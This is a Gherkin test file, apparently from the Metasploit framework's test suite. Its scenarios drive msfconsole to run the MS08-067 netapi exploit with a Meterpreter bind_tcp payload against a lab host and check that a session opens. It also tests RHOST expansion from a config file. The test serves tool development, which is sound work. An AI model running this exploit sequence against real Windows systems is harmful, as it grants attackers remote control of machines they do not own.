22 lines
598 B
Gherkin
22 lines
598 B
Gherkin
|
@msfconsole
|
||
|
Feature: MS08-067 netapi
|
||
|
|
||
|
Scenario: Test driving a module
|
||
|
When I type "use exploit/windows/smb/ms08_067_netapi"
|
||
|
And I type "set RHOST w2k3sp2-x86-u.vuln.lax.rapid7.com"
|
||
|
And I type "set PAYLOAD windows/meterpreter/bind_tcp"
|
||
|
And I type "run"
|
||
|
And I type "exit"
|
||
|
And I type "exit"
|
||
|
Then the output should match /Meterpreter session \d+ opened/
|
||
|
|
||
|
@msfconsole
|
||
|
@target
|
||
|
Scenario: Show RHOST/etc variable expansion from a config file
|
||
|
When RHOST is WINDOWS
|
||
|
And I type "show options"
|
||
|
And I type "exit"
|
||
|
Then the output should match /spider-wxp/
|
||
|
|
||
|
|